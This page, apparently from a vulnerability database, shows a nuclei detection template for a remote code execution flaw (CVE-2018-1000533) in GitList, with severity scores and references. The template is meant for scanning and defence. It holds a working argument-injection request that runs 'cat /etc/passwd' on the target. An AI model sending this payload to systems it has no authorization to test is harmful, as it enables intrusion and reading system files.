Lucene search
K

GitList < 0.6.0 Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 84 Views

GitList < 0.6.0 Remote Code Execution, vulnerability allows remote code execution via searchTree functio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-1000533
6 Jul 201819:46
circl
Check Point Advisories
GitList Remote Code Execution (CVE-2018-1000533)
28 Nov 202100:00
checkpoint_advisories
CVE
CVE-2018-1000533
26 Jun 201816:00
cve
Cvelist
CVE-2018-1000533
26 Jun 201816:00
cvelist
Metasploit
GitList v0.6.0 Argument Injection Vulnerability
3 Jul 201819:27
metasploit
NVD
CVE-2018-1000533
26 Jun 201816:29
nvd
Prion
Design/Logic Flaw
26 Jun 201816:29
prion
id: CVE-2018-1000533

info:
  name: GitList < 0.6.0 Remote Code Execution
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
    - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
    - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20
    epss-score: 0.72967
    epss-percentile: 0.99382
    cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: gitlist
    product: gitlist
    shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist"
  tags: cve,cve2018,git,gitlist,vulhub,rce,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        query=--open-files-in-pager=cat%20/etc/passwd

    matchers:
      - type: word
        part: body
        words:
          - "root:/root:/bin/bash"

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
          - '<span class="name">(.*?)</span>'
        internal: true
        part: body
# digest: 4a0a0047304502202d6ad8dd55450c7a238500bf49a6e85c2d6307f7101ccabb6be109501b29dd56022100ac0de7b817db979d6e472fbcd6b7c05f26830484c165758ab0ec559c792c13bc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.19.8
EPSS0.72967
84